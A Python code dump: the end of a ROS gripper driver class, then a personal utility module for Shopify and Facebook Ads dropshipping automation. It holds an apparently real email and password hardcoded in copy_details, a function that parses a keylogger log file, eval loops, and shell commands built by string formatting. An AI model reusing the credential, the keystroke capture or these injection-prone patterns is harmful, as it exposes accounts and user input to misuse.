rospy.signal_shutdown("MORE THAN {} GRIPPER TIMEOUTS".format(MAX_TIMEOUT))
sem = Semaphore(value=0) # use of semaphore ensures script will block if gripper dies during execution
self.sem_list.append(sem)
self._status_mutex.release()
start = rospy.get_time()
logging.getLogger('robot_logger').debug("gripper sem acquire, list len-{}".format(len(self.sem_list)))
sem.acquire()
logging.getLogger('robot_logger').debug("waited on gripper for {} seconds".format(rospy.get_time() - start))
else:
self._status_mutex.release()
def set_gripper(self, command_pos, wait = False):
assert command_pos >= GRIPPER_CLOSE and command_pos <= GRIPPER_OPEN, "Command pos must be in range [GRIPPER_CLOSE, GRIPPER_OPEN]"
self._set_gripper(command_pos, wait = wait)
@property
def GRIPPER_CLOSE(self):
return GRIPPER_CLOSE
@property
def GRIPPER_OPEN(self):
return GRIPPER_OPEN
def set_gripper_speed(self, new_speed):
assert new_speed > 0 and new_speed <= 600, "Speed must be in range (0, 600]"
self._gripper_speed = new_speed
def _gripper_callback(self, status):
# print('callback! list-len {}, max_release {}'.format(len(self.sem_list), self.max_release))
self._status_mutex.acquire()
self._gripper_width, self._gripper_force = status.width, status.force
self._integrate_gripper_force += status.force
self._force_counter += 1
cmd = Cmd()
cmd.pos = self._desired_gpos
cmd.speed = self._gripper_speed
self.gripper_pub.publish(cmd)
if len(self.sem_list) > 0:
gripper_close = np.isclose(self._gripper_width, self._desired_gpos, atol=1e-1)
if gripper_close or self._gripper_force > 0 or self.max_release > 15:
if self.max_release > 15:
self.num_timeouts += 1
for s in self.sem_list:
s.release()
self.sem_list = []
self.max_release += 1  # timeout for when the gripper is responsive but can't achieve the commanded state
else:
self.max_release = 0
self._last_status_t = time.time()
self._status_mutex.release()
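# Usage sketch (assumes a running ROS master and the wsg_50_driver node; the
# node name 'wsg50_example' below is illustrative only):
#
#     rospy.init_node('wsg50_example')
#     gripper = WSG50Gripper()
#     gripper.set_gripper(gripper.GRIPPER_OPEN, wait=True)
#     width, force = gripper.get_gripper_state()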
|
general_stuff.py
|
import os
from time import sleep as sleep, sleep as zz, sleep as sp
from os import system, makedirs
from subprocess import Popen, getoutput, check_output
from json_field import JSONField
from facebook_business.adobjects.targetingsearch import TargetingSearch
from facebook_business.adobjects.targeting import Targeting
# from facebook_business.adobjects.reachestimate import ReachEstimate
from facebook_business.adobjects.customaudiencedatasource import CustomAudienceDataSource
from facebook_business.adobjects.customaudience import CustomAudience
from facebook_business.adobjects.campaign import Campaign
from facebook_business.adobjects.adset import AdSet
from facebook_business.adobjects.adpreview import AdPreview
from facebook_business.adobjects.adimage import AdImage
from facebook_business.adobjects.adcreativephotodata import AdCreativePhotoData
from facebook_business.adobjects.adcreativeobjectstoryspec import AdCreativeObjectStorySpec
from facebook_business.adobjects.adcreativelinkdata import AdCreativeLinkData
from facebook_business.adobjects.adcreative import AdCreative
from facebook_business.adobjects.adaccount import AdAccount
from facebook_business.adobjects.ad import Ad
from facebook_business import FacebookAdsApi
from django.db.models import Q
from django.db import models
from django.conf import settings
from datetime import timedelta, date, datetime
from collections import OrderedDict, Counter, defaultdict
import time
import sys
import subprocess
import shopify
import pyperclip
import pickle
try:import rumps
except:pass
import requests as requests, requests as r
import re
import random
import os
import json
import csv
import copy
import string
g = lambda: globals()
rnd = round
ADSET_TESTING = False
Count = lambda l, x: l.count(x)
Database = "soda"
GLOBAL_ADD_PRODUCT_NOTIFICATION = False
GLOBAL_IMAGE_COMPARISON_TEST_SCORE = 0.9
GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL = 2
GLOBAL_BROWSER_ELEMENT_WAIT_TIME = 3 # 7
GLOBAL_BROWSER_GET_PAGE_WAIT_TIME = 12 # 12 # requires 12
GLOBAL_BROWSER_URLWAIT_WAIT_TIME = 10 # 60
GLOBAL_BROWSER_PAGEGOT_WAIT_TIME = 3 # 5
GLOBAL_BROWSER_REQUIRE_SPEEDTEST = False
GLOBAL_BROWSER_STEP_SLEEPTIME = 0
GLOBAL_BROWSER_WINDOW_POSITION = [0, 0]
GLOBAL_BROWSER_WINDOW_SIZE = [1920, 600] # [1920, 1200]
GLOBAL_EMAILER_INITIALIZE_ERROR_MESSAGE = False
GLOBAL_FIREFOX_PROFILE_PATH = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
DOWNLOAD_VIDEO = False
WHILE_TRUE = 100000000
EMPTYSTRING = ""
Null = None
Exists = lambda address: os.path.exists(String(address))
Join = lambda *args: args[0].join(args[1])if(2==len(args))else(args[0].join(args[1:]))
Replacements = lambda s, *args, LOL={}: [setitem(LOL,"z",s),[setitem(LOL,"z",LOL["z"].replace(x,j)) for x,j in zip(args[0::2],args[1::2])] ,LOL["z"]][-1]
Split = lambda *args: (args[1].split(args[0]))if(len(args)==2)else(args[1].split(args[0],args[2]))
Strip = lambda s: s.strip()
Title = lambda s: s.title().replace("'S ","'s")
add = "globals().update(g.__dict__)"
midcmd = """process(lambda:[[OSA.log(str(tryreturn(lambda:eval(OSA.log("Func?"))(),ep=1)))]for i in(range(WHILE_TRUE)]))"""
subtract = "g.__dict__.update(globals())"
sys.setrecursionlimit(100000)
"""
if not os.path.exists(homepath("~/.matplotlib")):
import imageio
os.system("mkdir ~/.matplotlib && touch ~/.matplotlib/matplotlibrc && echo 'backend: agg' >> ~/.matplotlib/matplotlibrc")
os.system("brew install ffmpeg &>/dev/null")
os.system("brew install mysql &>/dev/null")
imageio.plugins.ffmpeg.download()
os.system("brew install mpv --with-libcaca &>/dev/null")
os.system("asciiview")
os.system("open ueiraweur.png")
os.system("mpv fasdfs.jpg -vo caca")
"""
""" General-Utils """
def Copy(id,**kwargs):
# v3.3
return [setitem(kwargs,"x",list(map(Integer,key("copied_id", [Shop()(All(Shop)[0].shop_abbreviation),json.loads(requests.post("https://graph.facebook.com/v3.3/%s/copies"%id, data={ "deep_copy":"true",
"start_time":"%s 6:00:00 EST"%(Date().dt(0) if datetime.now().hour in [0,1,2] else Date().dt(1)),
"status_option": "ACTIVE",
"access_token": Shop.objects.all()[0].Facebook_Business_App_Token, }).content.decode())][1]["ad_object_ids"]))) ),
[[AdSet(kwargs["x"][0]).remote_update(params={"status":"ACTIVE"}),Ad(kwargs["x"][1]).remote_update(params={"status":"ACTIVE"}),] if(2==len(kwargs["x"])) else [Campaign(kwargs["x"][0]).remote_update(params={"status":"ACTIVE"}),AdSet(kwargs["x"][1]).remote_update(params={"status":"ACTIVE"}),Ad(kwargs["x"][2]).remote_update(params={"status":"ACTIVE"}),] ],
kwargs["x"],
][2]
def Exec(x,globals_,locals_):
globals().update(locals_)
exec(x,globals())
def Float(x):
return float(x)
def Integer(x):
return int(x)
def String(x):
return str(x)
def Ziff(*args):
s, sep = args[0], args[1]
maxsplit = -1 if len([i for i in args if type(i) == int])==0 else [i for i in args if type(i) == int][0]
fncs = None if len([i for i in args if type(i) == list])==0 else [i for i in args if type(i) == list][0]
y = s.split(sep,maxsplit)
if fncs == None:
return y
else:
y = [fncs[idx](i) for idx, i in enum(y)]
return y
"""
Ziff("x|y|z","|",[lambda i: i*2,lambda i: i*2,lambda i: i*2])
Ziff("x|y|z","|")
Ziff("x|y|z","|",1,[lambda i:i*2, lambda i: i*2])
"""
def add(x,y):
globals()[x] += y
return globals()[x]
def add_tag(x,y):
if x == "" or x == None:
x = y
else:
x += ", "
x += y
x = sorted(set(x.split(", ")))
x = Join(", ", x)
return x
"""
add_tag("","Test")
add_tag("Home","Test")
add_tag("Home, Place","Test")
"""
def add_text_to_file(file, text, line_number):
new_line_text = generate_one_random_number(5000)
os.system("""sed -i "" -e '%ss/$/%s/' '%s'"""%(line_number,new_line_text,file))
with open(file,"r") as f:
new = f.read().replace(str(new_line_text),"\n"+text)
open(file,"w").write(new)
def add_text_to_image(address,text,font=16,position=None):
from PIL import Image, ImageDraw, ImageFont
img = Image.open(address)
d = ImageDraw.Draw(img)
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", font)
if not position:
position = (5,5)
d.text(position, text, font=fnt, fill=(0, 0, 0))
img.save(address)
return address
def added_list(*args):
return flatten(args,1)
def address_backslash(address):
return address.replace(" ", "\\ ")
def address_normalize(address):
return(address)if(0==address.endswith("/"))else(address[:-1])
def array_even(data, count):
data2 = data
for data in data2:
while len(data)%count!=0:
data.append("")
return data2
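"""
Example: pads each inner list with '' until its length is a multiple of count
(note the inner lists are modified in place):
array_even([[1, 2, 3], [1]], 2) == [[1, 2, 3, ''], [1, '']]
"""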
def array_inner_even(data, delimiter="|"):
for idx, i in enumerate(data):
max_len = max(list(map(len, list(map(str, i)))))
for idx2, j in enumerate(i):
j = str(j)
if(max_len!=len(j)):
j = j + (delimiter*(max_len-len(j)))
i[idx2]=j
return data
def array_split(data, count, even=False):
"""
array_split(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 32, 33, 34, 35],
[36, 37, 38, 39, 40, 41, 42, 43, 44]]
"""
import numpy as np
data = list(data)
if len(data) % count == 0:
a = int(len(data)/count)
b = list(range(0,len(data),a))+[len(data)]
a_c = [data[i:i+a] for i in (b[:-1])]
data = a_c
else:
return array_split1(data, count)
data = list(map(list, data))
return array_even(data, count) if(True==even) else(data)
def array_split1(data, count, even=False):
"""
array_split1(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 32, 33, 34, 35],
[36, 37, 38, 39, 40, 41, 42, 43, 44]]
"""
import numpy as np
data = np.array(data)
data = np.array_split(data, (int(len(data)/count)+1))
data = list(map(list, data))
return array_even(data, count) if(True==even) else(data)
def array_split2(data, count):
"""
array_split2(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
[30, 31, 32, 33, 34, 35, 36, 37, 38, 39],
[40, 41, 42, 43, 44]]
"""
x = []
y = len(data) % count
z = []
i = 0
z.append(data[0:count]) if int(len(data)/count) == 0 else "`"
for i in range(int(len(data)/count)):
z.append(data[i*count:(i+1)*count])
z.append(data[(i+1)*count:]) if []!=data[(i+1)*count:] else "`"
return z
def apilimitcall(x, sleeptime = 5):
try:
# [(x.__call__()())if(x.__name__=="<lambda>")else(x.__call__()),blueprint("success")][0]
return [(x.__call__())if(x.__name__=="<lambda>")else(x.__call__()),blueprint("success")][0]
except Exception as e:
blueprint("error: %s; sleeping %s" % (e, sleeptime))
[[blueprint("waiting: %s\r"%(i+1),end=""),time.sleep(1)] for i in range(sleeptime)]
sleeptime = sleeptime + 5
return apilimitcall(x, sleeptime = sleeptime)
"""
x = lambda: (0/0) if random.random() > 0.5 else ()
apilimitcall(x)
"""
def assert_dialog(lambda_function, notification):
try:
assert lambda_function()
except:
OSA.display_dialog(notification, text_prompt = False, buttons = ["OK"])
def bind(obj,name,method):
from types import MethodType,ModuleType,FunctionType
setattr(obj, name, MethodType(method,obj))
def bind2(obj, name):
from types import MethodType,ModuleType,FunctionType
setattr(obj, name, MethodType(globals()[name],obj))
def bind3(obj,func):
from types import MethodType,ModuleType,FunctionType
setattr(obj, func.__name__, MethodType(func,obj))if("<lambda>"!=func.__name__)else(setattr(obj, get_lambda_name(func), MethodType(func,obj)))
def bindm(x,**kwargs):
[bind(x,a,b) for a,b in kwargs.items()]
return x
"""
bindm(AD(),test = lambda self: print(1)).test()
"""
def binded_update(x,y):
lmap(lambda i: bind(x,*i), y.items())
"""
x= AttrDict()
y={"croak": lambda self:print("croaks"),"moof":lambda self:print("moofs")}
binded_update(x,y)
x.croak()
x.moof()
"""
def brewlist(versions=False):
"""
With --versions you get e.g. 1.20.1_4, which is not necessarily what 'brew search' shows; the latest installed version tends to be the one used.
"""
return getoutput("brew list").split("\n")if(versions==False)else(lmap(lambda x: x.replace(" ", "@"), getoutput("brew list --versions").split("\n")))
"""
brewlist(versions = False)
brewlist(versions = True)
"""
def brightness(lvl):
OSA("System Events", ['brightness %s'%lvl])
def button_up(x=None,y=None,z=None,cork=None,headors=None):
if cork: return [dict(zip(lmap(re_spaces,key('text',headors(x))),lmap(re_spaces,key('text',i)))) for i in array_split(cork(x),int(len(cork(x))/len(headors(x))) )]
return dict(zip(lmap(lambda i: re_spaces(i), key("text",y(x))),lmap(lambda i: re_spaces(i), key("text",z(x)))))
def ceil(x):
import math
return math.ceil(x)
def check_option(option):
option = option.title()
if "Size" not in option and "Material" not in option and "Capacity" not in option and "Height" not in option and "Model" not in option:
return True
else:
return False
def check_output(x):
return or_list(lambda:subprocess.check_output(x,shell=True).decode()[:-1],lambda:subprocess.getoutput(x))
def cm_to_inch(s):
if "cm" not in s: return s
try:
cm_findings = re.findall(r" [0-9]*?cm", s)
for cm_finding in cm_findings:
x = cm_finding.replace("cm","")
x = int(x)
inch_measurement = x / 2.54
inch_measurement = round(inch_measurement, 1)
print("cm_to_inch finding: %scm to %sin" % (x, inch_measurement))
s = s.replace(cm_finding, "%sin"%inch_measurement)
print("[NOTE] function cm_to_inch --questionable use-- ")
except Exception as e:
print("cm to inches error: %s" % e)
print(s)
return s
def cm_to_inch2(s):
if "cm" not in s: return s
__original__ = s
try:
s = " " + s
cm_findings = re.findall(r"( .*?cm)", s)
for cm_finding in cm_findings:
original = cm_finding
cm_finding = cm_finding.replace("cm", "")
cm_finding = cm_finding.split(" ")[-1]
numbers = re.findall(r"[^0-9]*([0-9]*)",cm_finding)
tmp = []
print("tmp numbers: %s" % numbers)
for i in numbers:
try: tmp.append(int(i))
except Exception as e: print("error: %s, %s" % (i,e))
numbers = tmp
print("numbers after tmp: %s" % numbers)
numbers = [str(i) for i in numbers]
the_inch_copy = str(original)
for i in numbers:
rounded = round((int(i)/2.54), 1)
rounded = str(rounded)
the_inch_copy = the_inch_copy.replace(i, rounded)
print("cm: %s; rounded: %s" % (i, rounded))
print("new 'original' : %s" % the_inch_copy)
the_inch_copy = the_inch_copy.replace("cm", "in")
s = s.replace(original, the_inch_copy)
s = s.strip()
print("===\n\n===== now showing comparison..")
print("original: %s" % __original__)
print("\n\n")
print("s: %s" % s)
print("\n\n")
input("is this okay?: ")
return s
except Exception as e:
print("erorrror : %s" % e)
def cm_to_inch3(s):
s = Replacements(s, "2XL", "XXL", "3XL", "XXXL", "4XL", "XXXXL", "5XL", "XXXXXL", "6XL", "XXXXXXL")
swizes = re.findall(r"[0-9]+",s)
swizes = pool(Integer, swizes).result()
swizes_ = pool(lambda i: wall((i/2.54)), swizes).result()
s = Replacements(s, *list(map(str,sum(list(map(list,zip(swizes,swizes_))),[]))))
return s
def cm_to_inch4(a):
# NOTE: this early return disables the cm-to-inch conversion below, leaving the rest of the function as dead code
return a
w = findall(a,"[\d\.]+cm")
if w:
x = findall(a,"[\d\.]+cm")
assert len(x) == 1
y = findall(a,1,"[\d\.]+cm")
z = int(findall(y,1,"([\d\.]+)cm"))
z = round(float(z)/2.54,2)
z = str(z)
if z.endswith(".0"):
z = str(z).split(".")[0]
replacement_string = "{}in".format(z)
return re.sub("([\d\.]+cm)",replacement_string,a)
else:
return a
def compare_dict(a,b):
x=""
x+="{"
x+="\n"
for c,d in a.items():
x+=" "
x+="'%s': "%(c)
if d != b[c]:
x+="'%s' -> '%s',"%(d,b[c])
else:
x+="'%s'"%(d)
x+="\n"
x+="}"
print(x)
return x
"""
compare_dict(
{'ali_url': 'url',
'fulfilled quantity': 0,
'idx': 0,
'shipping_address': 'Shipping Address, City, State, Zip Code',
'sku': 'sku',
'title': 'title',
'total quantity': 0,
'variant_title': ''},
{'ali_url': 'url',
'fulfilled quantity': 1,
'idx': 0,
'shipping_address': 'Shipping Address, City, State, Zip Code',
'sku': 'sku',
'title': 'title',
'total quantity': 1,
'variant_title': ''}
)
"""
def copy_details():
pyperclip.copy("dsthingasdf@protonmail.com asdfghjkASDFGHJK in the drafts folder")
def copypickles(x,y):
import shutil
shutil.copy(x,y)
def create_directories(*args):
for idx,i in enum(args):
os.makedirs("/".join(args[:idx+1]),exist_ok=True)
"""
create_directories("a","b")
rm("a")
"""
def create_pypi_package(file_in,readme_text,desc):
basic_license = "Python. Free to use no attribution required."
name = file_in.replace(".py","")
version = "0.1.0"
description = desc
author = "pleasefeedme"
author_email = "myfakeemail@gmail.com"
license = basic_license
packages = [file_in.replace(".py","")]
install_requires = []
import os
os.makedirs(name)
os.chdir(name)
open("LICENSE.txt","w").write(basic_license)
open("README.md","w").write(readme_text)
open("setup.py","w").write(
"""
from setuptools import setup
setup(
name='%s',
version='%s',
description='%s',
author='%s',
author_email='%s',
license='%s',
packages=['%s'],
install_requires=%s)
"""%(name,version,description,author,author_email,basic_license,name,install_requires))
os.makedirs(name)
os.chdir(name)
import shutil
shutil.copy("../../%s"%(file_in),"./")
os.chdir("../")
# didn't work
def csed(r="class",s="class"):
greenprint("the use of ' is not supported")
s = s.replace('"','\\"').replace("'","\\'")
blueprint(re.findall(r, open(__file__).read(), flags=re.MULTILINE))
os.system("""sed -i '' -e 's/%s/%s/g' %s"""%(r,s,__file__))
def csv_table_to_html(table):
data = '<table border="1">'
data += '<tbody>'
numerical_row = 0
for row in table:
data += "<tr>"
numerical_col = 0
for cell in row:
data+= ("""<th style="text-align: center; color: #000000;">%s</th>"""%cell) if (numerical_row == 0\
or numerical_col == 0) else ("""<td style="text-align: center;">%s</td>"""%cell)
numerical_col += 1
numerical_row += 1
data += "</tr>"
data += "</tbody>"
data += "</table>"
return data
def csv_table_to_png(bux):
address = str(homepath("~/tavern/tavern/soda/dls/%s.csv"%random.randrange(99999999))).zfill(len("99999999"))
csv.writer(open(address,"w")).writerows(bux)
import pandas as pd
df = pd.read_csv(address)
os.remove(address)
htmTable = df.to_html()
load = re.sub(r"[\n\t]","",htmTable)
import cv2
reds = html_to_png(load)
q = cv2.imread(reds)
quinces = []
for x in range(q.shape[1]):
y = q[0:,x]
print(x, y.shape, set(y.flatten()))
if set(y.flatten()) == {255}:
quinces.append(x)
quinces = list(reversed(quinces))
zealous = None
for greater, lesser in zip(quinces[0:], quinces[1:]):
if (greater-lesser) != 1:
zealous = greater+10
break
redprint(zealous)
v = q[0:,0:zealous]
address = str(homepath("~/tavern/tavern/soda/dls/%s.png"%random.randrange(9999999999))).zfill(len("9999999999"))
cv2.imwrite(address, v)
impreview(address)
return address
def date_of_birth_drawer(date_of_birth, m_num = False):
date_of_birth = String(date_of_birth)
date_of_birth = date_of_birth.zfill(8)
m, d, y = ["January","February","March","April","May","June","July","August","September","October","November","December"].__getitem__(Integer(date_of_birth[:2])-1)if(m_num==False)else(date_of_birth[0:2]), date_of_birth[2:4], date_of_birth[4:]
return m, d, y
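"""
Example (expects an MMDDYYYY string or number):
date_of_birth_drawer("07041990") == ('July', '04', '1990')
date_of_birth_drawer("07041990", m_num=True) == ('07', '04', '1990')
"""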
def dataframe_to_dictlist(dataframe):
dictlist = []
headers = list(dataframe)
data = dataframe.to_dict()
data_len = len(data[headers[0]])
for idx in range(data_len):
e = {}
for header in headers:
e[header] = data[header][idx]
dictlist.append(e)
return dictlist
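"""
Example (sketch; assumes pandas is installed):
import pandas as pd
df = pd.DataFrame({"a": [1, 2], "b": [3, 4]})
dataframe_to_dictlist(df) == [{'a': 1, 'b': 3}, {'a': 2, 'b': 4}]
"""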
def datetime_math(x, **kwargs):
return x + timedelta(**kwargs)
def dbsed(s="",r=""):
csed(r, s)
def deepcopy(x):
return copy.deepcopy(x)
def delete_adset(adset_id):
Del(Get(Adset,adset_id=adset_id))
def delete_adsets():
a_shop()
for i in All(Adset):
if AdSet(i.adset_id).remote_read(fields=["status"])["status"] == "ARCHIVED":
print("Deleting one adset")
Del(i)
lmap(Del,Filter(Adsetinsight,adset_id=i.adset_id))
def delete_data():
lmap(Del,All(AceInTheHole))
lmap(Del,All(AceInTheHoleType))
lmap(Del,All(AceInTheHoleTypeTag))
lmap(Del,All(Adset))
lmap(Del,All(Aliexpress_Dispute))
lmap(Del,All(Aliexpressorder))
lmap(Del,All(Aliexpressorder_event))
lmap(Del,All(ApprovedTransaction))
lmap(Del,All(Facebookadaccountspend))
lmap(Del,All(GhostProduct))
lmap(Del,All(GhostProductUpdate))
lmap(Del,All(Keep_Exchange))
lmap(Del,All(Lineitem))
lmap(Del,All(New_Email))
lmap(Del,All(Order))
lmap(Del,All(Payment))
lmap(Del,All(Payout))
lmap(Del,All(Product))
lmap(Del,All(ProductTalk))
lmap(Del,All(ReOrder))
lmap(Del,All(Settlement))
lmap(Del,All(Soup))
lmap(Del,All(Video))
lmap(Del,All(TertiaryAction))
lmap(Del,All(ProductsFeed))
lmap(Del,All(LineitemsFeed))
def delete_last():
Del(All(RandomGeneratedWords).n(-1))
def dictfromkeys(headers, default_value, ordered=False):
x = dict(zip(headers, [default_value for header in headers]))if(ordered==False)else(OrderedDict(zip(headers, [default_value for header in headers])))
return x
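"""
Example (note: every key shares the same default_value object, so a mutable
default such as [] is shared across keys):
dictfromkeys(["a", "b"], 0) == {'a': 0, 'b': 0}
dictfromkeys(["a", "b"], 0, ordered=True) == OrderedDict([('a', 0), ('b', 0)])
"""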
def dictrecurse(attrdict):
for k,v in attrdict.items():
if type(v) == AttrDict:
attrdict[k] = dictrecurse(attrdict[k])
return dict(attrdict)
def dictupdate(x,**kwargs):
x.update(**kwargs)
return x
def decimal_re(x):
return Integer("".join(re.findall(r"\d+", x)))
def delete_keys(x,*args):
for i in args:
tryprocess(lambda: x.__delitem__(i))
return x
"""
a = {"a":"b","c":"d",}
delete_keys(a,"a","c")
"""
def dictionarymeaning(x):
from nltk.corpus import wordnet
y = sudby(lambda i:i.name().split(".")[0]==x,wordnet.synsets(x))
z = ifelseget(lambda:len(y) == 0,lambda:or_list(lambda:"Definition using Mirriam Webster. %s"%(re_substitute(random.choice(SOUPY(requests.get("https://www.merriam-webster.com/dictionary/%s"%(x)).text,"span","class","dtText")).text.split(": ")[1],["\s+"," "])),lambda:"No definition found for %s"%(x)),lambda:random.choice(y).definition())
return z
def dictjoin(*args,**kwargs):
x = {}
for i in args:
x.update(i)
return x
def dicttoxml(x):
import dicttoxml
return dicttoxml.dicttoxml(x)
def diff(x,y):
x_, y_ = x, y
x, y = lmap(lambda i:open(i).read().split("\n"),[x,y])
diffs = []
for i in x:
if i in y:
y.pop(y.index(i))
else:
diffs.append(i)
x, y = lmap(lambda i:open(i).read().split("\n"),[x_,y_])
for i in y:
if i in x:
x.pop(x.index(i))
else:
diffs.append(i)if(i not in diffs) else ()
print(len(diffs))
return diffs
def dip(x, y=1):
for i in range(y):
try:
x = sum(x,[])
except Exception as e:
x = x
return x
def dictxml(x,tcer=False):
if tcer == False:
import dicttoxml
y = dicttoxml.dicttoxml(x)
#y = y[0:39] + y[45:len(y)-7]
return y
else:
import xmltodict
y = xmltodict.parse(x)
return y
def dkey(x):
return list(x.items())[0][0]
"""
dkey({"a":"b"})
"""
def dl(x):
return Images().download(x)
def draw_circular_pay_chart():
length = 45
x = np.full(tuple(([length]*2)+[3]),[255,255,255])
coordinates = []
y = 0
for i in range(length):
coordinates.append((y,length-y-1))
y += 1
y = 0
for i in range(length):
coordinates.append((y,-(length-y)+1))
y += 1
y = 0
for i in range(length):
coordinates.append((-y,length-y-1))
y += 1
y = 0
for i in range(length):
coordinates.append((-y,-(length-y)+1))
y += 1
for i in coordinates:
x[i[0]][i[1]] = np.array([0,0,0])
def droll(x):
assert x() == True
def dt(x=0, strf='%Y-%m-%d'):
return (datetime.now() + timedelta(x)).strftime(strf)
def dune(*args):
x, y = args[0], args[1]
x = [y[idx](i) for idx,i in enum(x)]
return x
"""
dune("a, 2, 3".split(", "), [lambda i: i*2, lambda i:int(i)+2, lambda i:int(i)+5])
"""
def dvalue(x):
return list(x.items())[0][1]
"""
dvalue({"a":"b"})
"""
def emoji_viewer():
os.system("""osascript -e 'tell application "System Events" to key code 49 using {control down, command down}' """)
def enum(x):
return enumerate(x)
def eye_exam():
print("visit: https://www.personaleyes.com.au/online-eye-test/index.php")
print(" 1m away, 6 questions are asked ")
def extract_emojis(str):
import emoji
return ''.join(c for c in str if c in emoji.UNICODE_EMOJI)
def filter(objects, *args, **kwargs):
from django.db.models.query_utils import Q
objects = [AttrDict(i) if type(i)==dict else i for i in objects]
data = []
for i in objects:
to_append = 1
for attr, value in kwargs.items():
attr_arg = None
if "__" not in attr:
attr_arg = "equals"
elif "__" in attr and attr.split("__")[1] == "contains":
attr_arg = "contains"
elif "__" in attr and attr.split("__")[1] == "icontains":
attr_arg = "icontains"
elif "__" in attr and attr.split("__")[1] == "range":
attr_arg = "range"
attr=((attr)if("__" not in attr)else(attr.split("__")[0]))
if attr_arg == "equals" and not (getattr(i,attr) == value):
to_append = 0
if attr_arg == "contains" and not (value in getattr(i,attr)):
to_append = 0
if attr_arg == "icontains" and not (value.lower() in getattr(i,attr).lower()):
to_append = 0
if attr_arg == "range" and not (getattr(i,attr) >= value[0] and getattr(i,attr) <= value[1]):
to_append = 0
if(1==to_append):
data.append(i)
#data = []
#args = [~Q(x=5),~Q(y=5)]
#args = [~Q(x=5,y=5),]
#data = lmap(AD,[{"x":5,"y":5},{"x":5,"y":4},{"x":4,"y":5},{"x":4,"y":4}])
#new = []
#for i in data:
# to_append = True
# for j in args:
# for k, l in j.children:
# print(i, j, k, l)
# if getattr(i, k) == l:
# to_append = False
# print(getattr(i,k), l)
# if to_append == True:
# print(i)
# new.append(i)
#new = []
#for i in data:
# to_append = [True for i in range(len(args))]
# idx = 0
# for j in args:
# for k, l in j.children:
# print(i, j, k, l)
# if getattr(i, k) == l:
# to_append[idx] = False
# print(getattr(i,k), l)
# idx += 1
# if set(to_append) == {True}:
# print(i)
# new.append(i)
if args:
new = []
for i in data:
to_append = [True for i in range(len(args))]
idx = 0
for j in args:
all_signifiers = [True for i in range(len(j.children))]
idx_2 = 0
for k, l in j.children:
attr_arg = None
if "__" not in k:
attr_arg = "equals"
elif "__" in k and k.split("__")[1] == "contains":
attr_arg = "contains"
elif "__" in k and k.split("__")[1] == "icontains":
attr_arg = "icontains"
elif "__" in k and k.split("__")[1] == "range":
attr_arg = "range"
attr=((k)if("__" not in k)else(k.split("__")[0]))
value = l
if attr_arg == "equals" and (getattr(i,attr) == value):
all_signifiers[idx_2] = False
if attr_arg == "contains" and (value in getattr(i,attr)):
all_signifiers[idx_2] = False
if attr_arg == "icontains" and (value.lower() in getattr(i,attr).lower()):
all_signifiers[idx_2] = False
if attr_arg == "range" and (getattr(i,attr) >= value[0] and getattr(i,attr) <= value[1]):
all_signifiers[idx_2] = False
#if getattr(i, k) == l:
# #to_append[idx] = False
# all_signifiers[idx_2] = False
# print(getattr(i,k), l)
idx_2 += 1
if set(all_signifiers) == {False}:
to_append[idx] = False
idx += 1
if set(to_append) == {True}:
new.append(i)
data = new
return data
"""
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5),~Q(b=3)) == []
assert filter([{"a":5,"b":2},{"a":4,"b":3}],~Q(a=5),~Q(b=2)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3},{"a":5,"b":5}],~Q(a=5)) == [{'a': 4, 'b': 3}]
assert filter([{"a":5,"b":2},{"a":4,"b":3},{"a":5,"b":5}],~Q(a=5,b=5)) == [{'a': 5, 'b': 2}, {'a': 4, 'b': 3}]
"""
def filter_in(a, b, mode="show_not_there"):
assert len(oset(a)) == len(a)
assert len(oset(b)) == len(b)
if mode == "show_not_there":
x = []
for i in a:
if i in b:
x.append(i)
y = []
for i in b:
if i not in x:
y.append(i)
return y
elif mode == "show_there":
x = []
for i in a:
if i in b:
x.append(i)
return x
"""
filter_in([1,2,3],[1,2,3,4],"show_not_there")
filter_in([1,2,3],[1,2,3,4],"show_there")
filter_in([1,2,3,5],[1,2,3,4,5,6],"show_not_there")
"""
def findall(s, r, x=None):
return (re.findall(r, s))if(len(listminus(locals().values(),None))==2)else(re.findall(x, s)[0])if(len(listminus(locals().values(),[[]]))==3)else()
def flatten(x, y=1):
for i in range(y):
try:
x = sum(x,[])
except Exception as e:
x = x
return x
def floor(x):
import math; return math.floor(x)
def flt(x):
return float(x)
def font_preview(address):
from PIL import Image, ImageDraw, ImageFont
img = Image.new('RGB', (1800, 540), color = (255, 255, 255))
fnt = ImageFont.truetype(address, 45)
d = ImageDraw.Draw(img)
d.text((10,10), "[{}] Hello world. Untitled `404`.liquid ~`!@#$%^&*()_+-=[]\\|;':<>,.?/Seven Six Five Four".format(address.split("/")[-1]), font=fnt, fill=(0, 0, 0))
img.save('pil_text_font.png')
impreview('pil_text_font.png')
os.system('rm pil_text_font.png')
def free_plus_ship(x):
CH().free_plus_ship(x)
def generate_keylogger():
times, keys = [], []
file = open(homepath("~/hole/hole/keylogger/logfile.log")).read().split("\n")[:-1]
file = sudby(lambda i: i.split(" ",1)[1][0] != "[", file)
for i in file:
time, key = i.split(" ",1)
times.append(time)
keys.append(key)
time, letters, current_load, on = None, "", "", False
current_loads = []
for i, j in zip(times,keys):
letters = letters + j
time = i
if letters.endswith("ss-"):
on = True
if on == True:
current_load = current_load + j
if letters.endswith("-ee"):
on = False
time = i
current_load = current_load[2:-3]
print(current_load)
current_loads.append([time, current_load])
time = datetime.fromtimestamp(int(time))
tp(lambda:Save(Note,note=current_load,time=time))
letters = ""
current_load = ""
# if os.path.getsize(homepath("~/hole/hole/keylogger/logfile.log")) > 7432790:
# x = open(homepath("~/hole/hole/keylogger/logfile.log"),"r").readlines()
